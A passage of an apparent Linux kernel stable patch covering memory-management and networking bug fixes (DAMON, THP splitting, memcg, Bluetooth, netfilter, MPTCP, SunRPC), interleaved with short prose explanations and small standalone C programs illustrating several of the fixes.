++++ b/mm/damon/lru_sort.c
+@@ -195,9 +195,7 @@ static int damon_lru_sort_apply_parameters(void)
+ 	if (err)
+ 		return err;
+ 
+-	/* aggr_interval / sample_interval is the maximum nr_accesses */
+-	hot_thres = damon_lru_sort_mon_attrs.aggr_interval /
+-		damon_lru_sort_mon_attrs.sample_interval *
++	hot_thres = damon_max_nr_accesses(&damon_lru_sort_mon_attrs) *
+ 		hot_thres_access_freq / 1000;
+ 	scheme = damon_lru_sort_new_hot_scheme(hot_thres);
+ 	if (!scheme)
+diff --git a/mm/damon/ops-common.c b/mm/damon/ops-common.c
+index 13b99975cbc2c..0b75a8d5c7068 100644
+--- a/mm/damon/ops-common.c
++++ b/mm/damon/ops-common.c
+@@ -87,7 +87,6 @@ void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr
+ int damon_hot_score(struct damon_ctx *c, struct damon_region *r,
+ 			struct damos *s)
+ {
+-	unsigned int max_nr_accesses;
+ 	int freq_subscore;
+ 	unsigned int age_in_sec;
+ 	int age_in_log, age_subscore;
+@@ -95,8 +94,8 @@ int damon_hot_score(struct damon_ctx *c, struct damon_region *r,
+ 	unsigned int age_weight = s->quota.weight_age;
+ 	int hotness;
+ 
+-	max_nr_accesses = c->attrs.aggr_interval / c->attrs.sample_interval;
+-	freq_subscore = r->nr_accesses * DAMON_MAX_SUBSCORE / max_nr_accesses;
++	freq_subscore = r->nr_accesses * DAMON_MAX_SUBSCORE /
++		damon_max_nr_accesses(&c->attrs);
+ 
+ 	age_in_sec = (unsigned long)r->age * c->attrs.aggr_interval / 1000000;
+ 	for (age_in_log = 0; age_in_log < DAMON_MAX_AGE_IN_LOG && age_in_sec;
+diff --git a/mm/damon/sysfs.c b/mm/damon/sysfs.c
+index 07e5f1bdf025f..dbf5e4de97a0f 100644
+--- a/mm/damon/sysfs.c
++++ b/mm/damon/sysfs.c
+@@ -2188,58 +2188,75 @@ destroy_targets_out:
+ 	return err;
+ }
+ 
+-/*
+- * Search a target in a context that corresponds to the sysfs target input.
+- *
+- * Return: pointer to the target if found, NULL if not found, or negative
+- * error code if the search failed.
+- */
+-static struct damon_target *damon_sysfs_existing_target(
+-		struct damon_sysfs_target *sys_target, struct damon_ctx *ctx)
++static int damon_sysfs_update_target_pid(struct damon_target *target, int pid)
+ {
+-	struct pid *pid;
+-	struct damon_target *t;
++	struct pid *pid_new;
+ 
+-	if (!damon_target_has_pid(ctx)) {
+-		/* Up to only one target for paddr could exist */
+-		damon_for_each_target(t, ctx)
+-			return t;
+-		return NULL;
++	pid_new = find_get_pid(pid);
++	if (!pid_new)
++		return -EINVAL;
++
++	if (pid_new == target->pid) {
++		put_pid(pid_new);
++		return 0;
+ 	}
+ 
+-	/* ops.id should be DAMON_OPS_VADDR or DAMON_OPS_FVADDR */
+-	pid = find_get_pid(sys_target->pid);
+-	if (!pid)
+-		return ERR_PTR(-EINVAL);
+-	damon_for_each_target(t, ctx) {
+-		if (t->pid == pid) {
+-			put_pid(pid);
+-			return t;
+-		}
++	put_pid(target->pid);
++	target->pid = pid_new;
++	return 0;
++}
++
++static int damon_sysfs_update_target(struct damon_target *target,
++		struct damon_ctx *ctx,
++		struct damon_sysfs_target *sys_target)
++{
++	int err;
++
++	if (damon_target_has_pid(ctx)) {
++		err = damon_sysfs_update_target_pid(target, sys_target->pid);
++		if (err)
++			return err;
+ 	}
+-	put_pid(pid);
+-	return NULL;
++
++	/*
++	 * Update the monitoring target region boundaries only if the user has
++	 * set one or more regions.  This makes it easier to preserve current
++	 * monitoring target results and ranges, especially for ops like
++	 * 'vaddr' that update monitoring target regions dynamically.
++	 */
++	if (sys_target->regions->nr)
++		err = damon_sysfs_set_regions(target, sys_target->regions);
++	return err;
+ }
+ 
+ static int damon_sysfs_set_targets(struct damon_ctx *ctx,
+ 		struct damon_sysfs_targets *sysfs_targets)
+ {
+-	int i, err;
++	struct damon_target *t, *next;
++	int i = 0, err;
+ 
+ 	/* Multiple physical address space monitoring targets makes no sense */
+ 	if (ctx->ops.id == DAMON_OPS_PADDR && sysfs_targets->nr > 1)
+ 		return -EINVAL;
+ 
+-	for (i = 0; i < sysfs_targets->nr; i++) {
++	damon_for_each_target_safe(t, next, ctx) {
++		if (i < sysfs_targets->nr) {
++			err = damon_sysfs_update_target(t, ctx,
++					sysfs_targets->targets_arr[i]);
++			if (err)
++				return err;
++		} else {
++			if (damon_target_has_pid(ctx))
++				put_pid(t->pid);
++			damon_destroy_target(t);
++		}
++		i++;
++	}
++
++	for (; i < sysfs_targets->nr; i++) {
+ 		struct damon_sysfs_target *st = sysfs_targets->targets_arr[i];
+-		struct damon_target *t = damon_sysfs_existing_target(st, ctx);
+ 
+-		if (IS_ERR(t))
+-			return PTR_ERR(t);
+-		if (!t)
+-			err = damon_sysfs_add_target(st, ctx);
+-		else
+-			err = damon_sysfs_set_regions(t, st->regions);
++		err = damon_sysfs_add_target(st, ctx);
+ 		if (err)
+ 			return err;
+ 	}
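
The rewritten damon_sysfs_set_targets() reconciles the kernel's target list against the requested sysfs array in one pass: overlapping entries are updated in place, surplus kernel targets are destroyed, and any remaining requested entries are appended. A minimal sketch of that control flow with the damon specifics replaced by plain arrays (names here are hypothetical, not the kernel API):

#include <stdio.h>

/* Reconcile cur[0..*cur_n) against want[0..want_n): update the overlap,
 * drop the surplus, append the remainder. */
static void reconcile(int *cur, int *cur_n, const int *want, int want_n)
{
	int i;

	for (i = 0; i < *cur_n; i++) {
		if (i < want_n)
			cur[i] = want[i];  /* update existing entry in place */
		/* else: surplus entry is destroyed here */
	}
	for (; i < want_n; i++)
		cur[i] = want[i];          /* append newly requested entries */
	*cur_n = want_n;
}

int main(void)
{
	int cur[8] = {1, 2, 3}, n = 3;
	const int want[2] = {7, 8};

	reconcile(cur, &n, want, 2);
	for (int i = 0; i < n; i++)
		printf("%d ", cur[i]);     /* prints: 7 8 */
	printf("\n");
	return 0;
}
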
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index b20fef29e5bb5..2753fb54cdf38 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2757,13 +2757,15 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 			int nr = folio_nr_pages(folio);
+ 
+ 			xas_split(&xas, folio, folio_order(folio));
+-			if (folio_test_swapbacked(folio)) {
+-				__lruvec_stat_mod_folio(folio, NR_SHMEM_THPS,
+-							-nr);
+-			} else {
+-				__lruvec_stat_mod_folio(folio, NR_FILE_THPS,
+-							-nr);
+-				filemap_nr_thps_dec(mapping);
++			if (folio_test_pmd_mappable(folio)) {
++				if (folio_test_swapbacked(folio)) {
++					__lruvec_stat_mod_folio(folio,
++							NR_SHMEM_THPS, -nr);
++				} else {
++					__lruvec_stat_mod_folio(folio,
++							NR_FILE_THPS, -nr);
++					filemap_nr_thps_dec(mapping);
++				}
+ 			}
+ 		}
+ 
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index dacbaf4f7b2c4..9da98e3e71cfe 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -2854,7 +2854,8 @@ static void commit_charge(struct folio *folio, struct mem_cgroup *memcg)
+  * Moreover, it should not come from DMA buffer and is not readily
+  * reclaimable. So those GFP bits should be masked off.
+  */
+-#define OBJCGS_CLEAR_MASK	(__GFP_DMA | __GFP_RECLAIMABLE | __GFP_ACCOUNT)
++#define OBJCGS_CLEAR_MASK	(__GFP_DMA | __GFP_RECLAIMABLE | \
++				 __GFP_ACCOUNT | __GFP_NOFAIL)
+ 
+ /*
+  * mod_objcg_mlstate() may be called with irq enabled, so
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index fd40f7e9f1763..bd2570b4f9b7b 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1611,7 +1611,7 @@ static int scan_movable_pages(unsigned long start, unsigned long end,
+ 		 */
+ 		if (HPageMigratable(head))
+ 			goto found;
+-		skip = compound_nr(head) - (page - head);
++		skip = compound_nr(head) - (pfn - page_to_pfn(head));
+ 		pfn += skip - 1;
+ 	}
+ 	return -ENOENT;
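
The scan_movable_pages() one-liner replaces struct-page pointer arithmetic with pfn arithmetic: `page - head` is only meaningful when the memmap is virtually contiguous (SPARSEMEM_VMEMMAP), while pfn differences are linear on every memory model, including plain SPARSEMEM where a compound page's struct pages may span discontiguous sections. A worked example of the corrected skip computation:

#include <stdio.h>

int main(void)
{
	unsigned long head_pfn = 0x40000; /* first pfn of the compound page */
	unsigned long nr = 512;           /* compound_nr(): 2 MiB THP in 4 KiB pages */
	unsigned long pfn = 0x40100;      /* current scan position inside it */

	/* Skip the rest of the compound page in one step. */
	unsigned long skip = nr - (pfn - head_pfn);

	printf("skip=%lu next=0x%lx\n", skip, pfn + skip); /* skip=256 next=0x40200 */
	return 0;
}
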
+diff --git a/net/9p/client.c b/net/9p/client.c
+index a96e127ca4883..84b93b04d0f06 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1987,7 +1987,7 @@ struct p9_fid *p9_client_xattrwalk(struct p9_fid *file_fid,
+ 		goto error;
+ 	}
+ 	p9_debug(P9_DEBUG_9P,
+-		 ">>> TXATTRWALK file_fid %d, attr_fid %d name %s\n",
++		 ">>> TXATTRWALK file_fid %d, attr_fid %d name '%s'\n",
+ 		 file_fid->fid, attr_fid->fid, attr_name);
+ 
+ 	req = p9_client_rpc(clnt, P9_TXATTRWALK, "dds",
+diff --git a/net/9p/trans_fd.c b/net/9p/trans_fd.c
+index 5a1aecf7fe487..a69422366a235 100644
+--- a/net/9p/trans_fd.c
++++ b/net/9p/trans_fd.c
+@@ -833,14 +833,21 @@ static int p9_fd_open(struct p9_client *client, int rfd, int wfd)
+ 		goto out_free_ts;
+ 	if (!(ts->rd->f_mode & FMODE_READ))
+ 		goto out_put_rd;
+-	/* prevent workers from hanging on IO when fd is a pipe */
+-	ts->rd->f_flags |= O_NONBLOCK;
++	/* Prevent workers from hanging on IO when fd is a pipe.
++	 * It's technically possible for userspace or concurrent mounts to
++	 * modify this flag concurrently, which will likely result in a
++	 * broken filesystem. However, just having bad flags here should
++	 * not crash the kernel or cause any other sort of bug, so mark this
++	 * particular data race as intentional so that tooling (like KCSAN)
++	 * can allow it and detect further problems.
++	 */
++	data_race(ts->rd->f_flags |= O_NONBLOCK);
+ 	ts->wr = fget(wfd);
+ 	if (!ts->wr)
+ 		goto out_put_rd;
+ 	if (!(ts->wr->f_mode & FMODE_WRITE))
+ 		goto out_put_wr;
+-	ts->wr->f_flags |= O_NONBLOCK;
++	data_race(ts->wr->f_flags |= O_NONBLOCK);
+ 
+ 	client->trans = ts;
+ 	client->status = Connected;
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 728be9307f526..55e0ecd88543e 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -168,13 +168,11 @@ static void hci_conn_cleanup(struct hci_conn *conn)
+ 			hdev->notify(hdev, HCI_NOTIFY_CONN_DEL);
+ 	}
+ 
+-	hci_conn_del_sysfs(conn);
+-
+ 	debugfs_remove_recursive(conn->debugfs);
+ 
+-	hci_dev_put(hdev);
++	hci_conn_del_sysfs(conn);
+ 
+-	hci_conn_put(conn);
++	hci_dev_put(hdev);
+ }
+ 
+ static void le_scan_cleanup(struct work_struct *work)
+diff --git a/net/bluetooth/hci_sysfs.c b/net/bluetooth/hci_sysfs.c
+index 08542dfc2dc53..633b82d542728 100644
+--- a/net/bluetooth/hci_sysfs.c
++++ b/net/bluetooth/hci_sysfs.c
+@@ -33,7 +33,7 @@ void hci_conn_init_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	BT_DBG("conn %p", conn);
++	bt_dev_dbg(hdev, "conn %p", conn);
+ 
+ 	conn->dev.type = &bt_link;
+ 	conn->dev.class = bt_class;
+@@ -46,27 +46,30 @@ void hci_conn_add_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	BT_DBG("conn %p", conn);
++	bt_dev_dbg(hdev, "conn %p", conn);
+ 
+ 	if (device_is_registered(&conn->dev))
+ 		return;
+ 
+ 	dev_set_name(&conn->dev, "%s:%d", hdev->name, conn->handle);
+ 
+-	if (device_add(&conn->dev) < 0) {
++	if (device_add(&conn->dev) < 0)
+ 		bt_dev_err(hdev, "failed to register connection device");
+-		return;
+-	}
+-
+-	hci_dev_hold(hdev);
+ }
+ 
+ void hci_conn_del_sysfs(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 
+-	if (!device_is_registered(&conn->dev))
++	bt_dev_dbg(hdev, "conn %p", conn);
++
++	if (!device_is_registered(&conn->dev)) {
++		/* If device_add() has *not* succeeded, use *only* put_device()
++		 * to drop the reference count.
++		 */
++		put_device(&conn->dev);
+ 		return;
++	}
+ 
+ 	while (1) {
+ 		struct device *dev;
+@@ -78,9 +81,7 @@ void hci_conn_del_sysfs(struct hci_conn *conn)
+ 		put_device(dev);
+ 	}
+ 
+-	device_del(&conn->dev);
+-
+-	hci_dev_put(hdev);
++	device_unregister(&conn->dev);
+ }
+ 
+ static void bt_host_release(struct device *dev)
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index 73242962be5d7..06d94b2c6b5de 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -37,7 +37,7 @@ static int nf_br_ip_fragment(struct net *net, struct sock *sk,
+ 	ktime_t tstamp = skb->tstamp;
+ 	struct ip_frag_state state;
+ 	struct iphdr *iph;
+-	int err;
++	int err = 0;
+ 
+ 	/* for offloaded checksums cleanup checksum before fragmentation */
+ 	if (skb->ip_summed == CHECKSUM_PARTIAL &&
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 0ee2e33bbe5f8..4305e55dbfba4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -596,7 +596,7 @@ struct dst_entry *__sk_dst_check(struct sock *sk, u32 cookie)
+ 	    INDIRECT_CALL_INET(dst->ops->check, ip6_dst_check, ipv4_dst_check,
+ 			       dst, cookie) == NULL) {
+ 		sk_tx_queue_clear(sk);
+-		sk->sk_dst_pending_confirm = 0;
++		WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 		RCU_INIT_POINTER(sk->sk_dst_cache, NULL);
+ 		dst_release(dst);
+ 		return NULL;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 62d9472ac8bca..f2ed2aed08ab3 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -731,12 +731,12 @@ int __inet_hash(struct sock *sk, struct sock *osk)
+ 		if (err)
+ 			goto unlock;
+ 	}
++	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	if (IS_ENABLED(CONFIG_IPV6) && sk->sk_reuseport &&
+ 		sk->sk_family == AF_INET6)
+ 		__sk_nulls_add_node_tail_rcu(sk, &ilb2->nulls_head);
+ 	else
+ 		__sk_nulls_add_node_rcu(sk, &ilb2->nulls_head);
+-	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+ unlock:
+ 	spin_unlock(&ilb2->lock);
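
Setting SOCK_RCU_FREE before the nulls-list insertion is a publish-ordering fix: the moment __sk_nulls_add_node_rcu() makes the socket visible, lockless RCU readers may find it, and if the flag is still clear the socket can later be freed without waiting for a grace period, leaving those readers with a use-after-free. The same initialize-then-publish discipline in portable C11, as a rough analogy (the kernel relies on the ordering guarantees of the RCU list primitives, not a plain release store):

#include <stdatomic.h>
#include <stdio.h>

struct sock_like {
	int rcu_free;	/* must be valid before the object is visible */
};

static _Atomic(struct sock_like *) published;

static void publish(struct sock_like *sk)
{
	sk->rcu_free = 1;	/* 1) finish initialization first */
	/* 2) release store orders the write above before publication */
	atomic_store_explicit(&published, sk, memory_order_release);
}

int main(void)
{
	static struct sock_like sk;
	struct sock_like *seen;

	publish(&sk);
	seen = atomic_load_explicit(&published, memory_order_acquire);
	printf("rcu_free=%d\n", seen->rcu_free);	/* always 1 */
	return 0;
}
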
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index cc7ed86fb0a57..5b93d1ed1ed19 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -1319,7 +1319,7 @@ static int __tcp_transmit_skb(struct sock *sk, struct sk_buff *skb,
+ 	skb->destructor = skb_is_tcp_pure_ack(skb) ? __sock_wfree : tcp_wfree;
+ 	refcount_add(skb->truesize, &sk->sk_wmem_alloc);
+ 
+-	skb_set_dst_pending_confirm(skb, sk->sk_dst_pending_confirm);
++	skb_set_dst_pending_confirm(skb, READ_ONCE(sk->sk_dst_pending_confirm));
+ 
+ 	/* Build TCP header and checksum it. */
+ 	th = (struct tcphdr *)skb->data;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index ee9f455bb2d18..2ca442f485132 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -3006,6 +3006,10 @@ static int ieee80211_get_tx_power(struct wiphy *wiphy,
+ 	else
+ 		*dbm = sdata->vif.bss_conf.txpower;
+ 
++	/* INT_MIN indicates no power level was set yet */
++	if (*dbm == INT_MIN)
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 5d845fcf3d09e..980050f6b456f 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1557,8 +1557,9 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ 	struct mptcp_pm_addr_entry *entry;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		remove_anno_list_by_saddr(msk, &entry->addr);
+-		if (alist.nr < MPTCP_RM_IDS_MAX)
++		if ((remove_anno_list_by_saddr(msk, &entry->addr) ||
++		     lookup_subflow_by_saddr(&msk->conn_list, &entry->addr)) &&
++		    alist.nr < MPTCP_RM_IDS_MAX)
+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 0eb20274459c8..76539d1004ebb 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1275,6 +1275,8 @@ static void mptcp_update_infinite_map(struct mptcp_sock *msk,
+ 	mptcp_do_fallback(ssk);
+ }
+ 
++#define MPTCP_MAX_GSO_SIZE (GSO_LEGACY_MAX_SIZE - (MAX_TCP_HEADER + 1))
++
+ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 			      struct mptcp_data_frag *dfrag,
+ 			      struct mptcp_sendmsg_info *info)
+@@ -1301,6 +1303,8 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 		return -EAGAIN;
+ 
+ 	/* compute send limit */
++	if (unlikely(ssk->sk_gso_max_size > MPTCP_MAX_GSO_SIZE))
++		ssk->sk_gso_max_size = MPTCP_MAX_GSO_SIZE;
+ 	info->mss_now = tcp_send_mss(ssk, &info->size_goal, info->flags);
+ 	copy = info->size_goal;
+ 
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 937bd4c556151..30374fd44228f 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -735,8 +735,11 @@ static int mptcp_setsockopt_v4_set_tos(struct mptcp_sock *msk, int optname,
+ 	val = inet_sk(sk)->tos;
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		bool slow;
+ 
++		slow = lock_sock_fast(ssk);
+ 		__ip_sock_set_tos(ssk, val);
++		unlock_sock_fast(ssk, slow);
+ 	}
+ 	release_sock(sk);
+ 
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index f8854bff286cb..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -89,11 +89,6 @@ static int ncsi_aen_handler_lsc(struct ncsi_dev_priv *ndp,
+ 	if ((had_link == has_link) || chained)
+ 		return 0;
+ 
+-	if (had_link)
+-		netif_carrier_off(ndp->ndev.dev);
+-	else
+-		netif_carrier_on(ndp->ndev.dev);
+-
+ 	if (!ndp->multi_package && !nc->package->multi_channel) {
+ 		if (had_link) {
+ 			ndp->flags |= NCSI_DEV_RESHUFFLE;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d6d59e36d17a7..421211eba838b 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6194,6 +6194,12 @@ static int nft_setelem_deactivate(const struct net *net,
+ 	return ret;
+ }
+ 
++static void nft_setelem_catchall_destroy(struct nft_set_elem_catchall *catchall)
++{
++	list_del_rcu(&catchall->list);
++	kfree_rcu(catchall, rcu);
++}
++
+ static void nft_setelem_catchall_remove(const struct net *net,
+ 					const struct nft_set *set,
+ 					const struct nft_set_elem *elem)
+@@ -6202,8 +6208,7 @@ static void nft_setelem_catchall_remove(const struct net *net,
+ 
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		if (catchall->elem == elem->priv) {
+-			list_del_rcu(&catchall->list);
+-			kfree_rcu(catchall, rcu);
++			nft_setelem_catchall_destroy(catchall);
+ 			break;
+ 		}
+ 	}
+@@ -9266,9 +9271,8 @@ void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans)
+ 	call_rcu(&trans->rcu, nft_trans_gc_trans_free);
+ }
+ 
+-static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
+-						  unsigned int gc_seq,
+-						  bool sync)
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq)
+ {
+ 	struct nft_set_elem_catchall *catchall;
+ 	const struct nft_set *set = gc->set;
+@@ -9284,11 +9288,7 @@ static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
+ 
+ 		nft_set_elem_dead(ext);
+ dead_elem:
+-		if (sync)
+-			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+-		else
+-			gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
+-
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
+ 		if (!gc)
+ 			return NULL;
+ 
+@@ -9298,15 +9298,34 @@ dead_elem:
+ 	return gc;
+ }
+ 
+-struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
+-						 unsigned int gc_seq)
+-{
+-	return nft_trans_gc_catchall(gc, gc_seq, false);
+-}
+-
+ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ {
+-	return nft_trans_gc_catchall(gc, 0, true);
++	struct nft_set_elem_catchall *catchall, *next;
++	const struct nft_set *set = gc->set;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net));
++
++	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++
++		if (!nft_set_elem_expired(ext))
++			continue;
++
++		gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
++		if (!gc)
++			return NULL;
++
++		memset(&elem, 0, sizeof(elem));
++		elem.priv = catchall->elem;
++
++		nft_setelem_data_deactivate(gc->net, gc->set, &elem);
++		nft_setelem_catchall_destroy(catchall);
++		nft_trans_gc_elem_add(gc, elem.priv);
++	}
++
++	return gc;
+ }
+ 
+ static void nf_tables_module_autoload_cleanup(struct net *net)
+diff --git a/net/netfilter/nft_byteorder.c b/net/netfilter/nft_byteorder.c
+index 2e2eb2cb17bc7..605178133d9eb 100644
+--- a/net/netfilter/nft_byteorder.c
++++ b/net/netfilter/nft_byteorder.c
+@@ -38,13 +38,14 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 
+ 	switch (priv->size) {
+ 	case 8: {
++		u64 *dst64 = (void *)dst;
+ 		u64 src64;
+ 
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 8; i++) {
+ 				src64 = nft_reg_load64(&src[i]);
+-				nft_reg_store64(&dst[i],
++				nft_reg_store64(&dst64[i],
+ 						be64_to_cpu((__force __be64)src64));
+ 			}
+ 			break;
+@@ -52,7 +53,7 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 			for (i = 0; i < priv->len / 8; i++) {
+ 				src64 = (__force __u64)
+ 					cpu_to_be64(nft_reg_load64(&src[i]));
+-				nft_reg_store64(&dst[i], src64);
++				nft_reg_store64(&dst64[i], src64);
+ 			}
+ 			break;
+ 		}
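
The dst64 cast in nft_byteorder_eval() fixes a pointer-stride bug: dst is an array of 32-bit registers, so &dst[i] advances four bytes per iteration while nft_reg_store64() writes eight, meaning every store after the first clobbered half of the previous result. Indexing through a u64 * restores the eight-byte stride (the nft_meta.c hunk below just adapts a caller to the new prototype). A userspace demonstration of the two strides:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t regs[8];	/* register file of 32-bit slots */

static void store64(void *dst, uint64_t val)
{
	memcpy(dst, &val, sizeof(val));	/* 8-byte, alignment-safe store */
}

int main(void)
{
	uint32_t *dst = regs;
	uint64_t *dst64 = (void *)regs;

	/* Buggy stride: &dst[1] is only 4 bytes past &dst[0], so the
	 * second store overwrites half of the first value. */
	store64(&dst[0], 0x1111111111111111ULL);
	store64(&dst[1], 0x2222222222222222ULL);
	printf("overlapped: %08x %08x %08x\n", regs[0], regs[1], regs[2]);

	/* Fixed stride: &dst64[1] is 8 bytes past &dst64[0]. */
	store64(&dst64[0], 0x1111111111111111ULL);
	store64(&dst64[1], 0x2222222222222222ULL);
	printf("correct:    %08x %08x %08x %08x\n",
	       regs[0], regs[1], regs[2], regs[3]);
	return 0;
}
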
+diff --git a/net/netfilter/nft_meta.c b/net/netfilter/nft_meta.c
+index 55d2d49c34259..6e83321926229 100644
+--- a/net/netfilter/nft_meta.c
++++ b/net/netfilter/nft_meta.c
+@@ -63,7 +63,7 @@ nft_meta_get_eval_time(enum nft_meta_keys key,
+ {
+ 	switch (key) {
+ 	case NFT_META_TIME_NS:
+-		nft_reg_store64(dest, ktime_get_real_ns());
++		nft_reg_store64((u64 *)dest, ktime_get_real_ns());
+ 		break;
+ 	case NFT_META_TIME_DAY:
+ 		nft_reg_store8(dest, nft_meta_weekday());
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 2b803383c7b31..61e5c77462e94 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -111,7 +111,8 @@ static void rpc_clnt_remove_pipedir(struct rpc_clnt *clnt)
+ 
+ 	pipefs_sb = rpc_get_sb_net(net);
+ 	if (pipefs_sb) {
+-		__rpc_clnt_remove_pipedir(clnt);
++		if (pipefs_sb == clnt->pipefs_sb)
++			__rpc_clnt_remove_pipedir(clnt);
+ 		rpc_put_sb_net(net);
+ 	}
+ }
+@@ -151,6 +152,8 @@ rpc_setup_pipedir(struct super_block *pipefs_sb, struct rpc_clnt *clnt)
+ {
+ 	struct dentry *dentry;
+ 
++	clnt->pipefs_sb = pipefs_sb;
++
+ 	if (clnt->cl_program->pipe_dir_name != NULL) {
+ 		dentry = rpc_setup_pipedir_sb(pipefs_sb, clnt);
+ 		if (IS_ERR(dentry))
+@@ -2157,6 +2160,7 @@ call_connect_status(struct rpc_task *task)
+ 	task->tk_status = 0;
+ 	switch (status) {
+ 	case -ECONNREFUSED:
++	case -ECONNRESET:
+ 		/* A positive refusal suggests a rebind is needed. */
+ 		if (RPC_IS_SOFTCONN(task))
+ 			break;
+@@ -2165,7 +2169,6 @@ call_connect_status(struct rpc_task *task)
+ 			goto out_retry;
+ 		}
+ 		fallthrough;
+-	case -ECONNRESET:
+ 	case -ECONNABORTED:
+ 	case -ENETDOWN:
+ 	case -ENETUNREACH:
+diff --git a/net/sunrpc/rpcb_clnt.c b/net/sunrpc/rpcb_clnt.c
+index 5a8e6d46809ae..82afb56695f8d 100644
+--- a/net/sunrpc/rpcb_clnt.c
++++ b/net/sunrpc/rpcb_clnt.c
+@@ -746,6 +746,10 @@ void rpcb_getport_async(struct rpc_task *task)
+ 
+ 	child = rpcb_call_async(rpcb_clnt, map, proc);
+ 	rpc_release_client(rpcb_clnt);
++	if (IS_ERR(child)) {
++		/* rpcb_map_release() has freed the arguments */
++		return;
++	}
+ 
+ 	xprt->stat.bind_count++;
+ 	rpc_put_task(child);
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 6da6608985ce9..b2dd01e5274e9 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -857,7 +857,8 @@ out_readfail:
+ 	if (ret == -EINVAL)
+ 		svc_rdma_send_error(rdma_xprt, ctxt, ret);
+ 	svc_rdma_recv_ctxt_put(rdma_xprt, ctxt);
+-	return ret;
++	svc_xprt_deferred_close(xprt);
++	return -ENOTCONN;
+ 
+ out_backchannel:
+ 	svc_rdma_handle_bc_reply(rqstp, ctxt);
